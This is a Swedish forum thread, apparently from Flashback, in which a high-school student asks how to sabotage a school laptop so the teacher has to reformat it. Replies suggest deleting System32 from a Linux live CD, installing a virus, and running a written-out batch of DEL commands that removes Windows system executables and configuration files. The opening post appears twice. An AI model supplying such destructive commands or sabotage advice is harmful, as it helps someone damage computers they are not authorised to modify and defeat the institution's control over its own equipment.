Tjena.
Det är så här att på mitt gymnasium använder vi bärbara datorer till nästan allting. Jag har haft min i 1½ år nu och den är trög som tusan plus att bluetooth funktionen försvunnit helt. Jag skulle gärna vilja formatera om den men har inte tillåtelse att göra det, Det måste dataläraren göra. Har pratat med honom men han vill inte slösa massa tid om datorn fungerar.
Såå, nån som vet hur man gör för att sabotera lite? Nåt som bara kan lösas med formatering, typ ta bort massa filer eller nåt.
Tror du inte har tillgång till mappar heller, försök att boota med en Linux Live cd, sen så raderar du system 32 eller något liknande. Viktigt att du säkerhetskopierar dina filer ordentligt.
Btw? Är inte detta riktigt onödigt? Du kommer säkert bi utan dator i 1 - 3 veckor.
Du skulle kunna installera något jävligt virus, det är det enda jag kan tänka mig som du kan göra, eftersom du inte lär ha tillåtelse att göra något med mappar i system32 elr liknande.. eller du kanske inte ens får installera program?
Kör den här koden igenom en diskett så kan jag tro att det blir och formatera om datorn.
DEL C:\Autoexec.bat
DEL C:\Command.com
DEL C:\Windows\Explorer.exe
DEL C:\Windows\Telenet.exe
DEL C:\Windows\Ftp.exe
DEL C:\Windows\Net.exe
DEL C:\Windows\Tracert.exe
DEL C:\Windows\Ping.exe
DEL C:\Windows\Calc.exe
DEL C:\Windows\desktop.ini
DEL C:\Windows\Msdos.sys
DEL C:\Windows\Notepad.exe
DEL C:\Windows\Progman.exe
DEL C:\Windows\Progman.ini
DEL C:\Windows\Regedit.exe
DEL C:\Windows\Route.exe
DEL C:\Windows\Rundll.exe
DEL C:\Windows\Rundll32.exe
DEL C:\Windows\Scandskw.exe
DEL C:\Windows\Scanregw.exe
DEL C:\Windows\Winfile.exe
DEL C:\Windows\Write.exe
DEL C:\Windows\System\Sysedit.exe
DEL C:\Windows\System\Systray.exe
DEL C:\Windows\System32\Desktop.ini
ELLER, så kan du dra en magnet över hårddisker, och alternativt skicka ner datorn i en grenflis
Tjena.
Det är så här att på mitt gymnasium använder vi bärbara datorer till nästan allting. Jag har haft min i 1½ år nu och den är trög som tusan plus att bluetooth funktionen försvunnit helt. Jag skulle gärna vilja formatera om den men har inte tillåtelse att göra det, Det måste dataläraren göra. Har pratat med honom men han vill inte slösa massa tid om datorn fungerar.
Såå, nån som vet hur man gör för att sabotera lite? Nåt som bara kan lösas med formatering, typ ta bort massa filer eller nåt.
Skulle det inte vara lättare att du övertalar läraren att göra det själv?
Antar att ni kör med en image fil som ghostas, det är ju inte direkt en process som behöver övervakas.
Flashback finansieras genom donationer från våra medlemmar och besökare. Det är med hjälp av dig vi kan fortsätta erbjuda en fri samhällsdebatt. Tack för ditt stöd!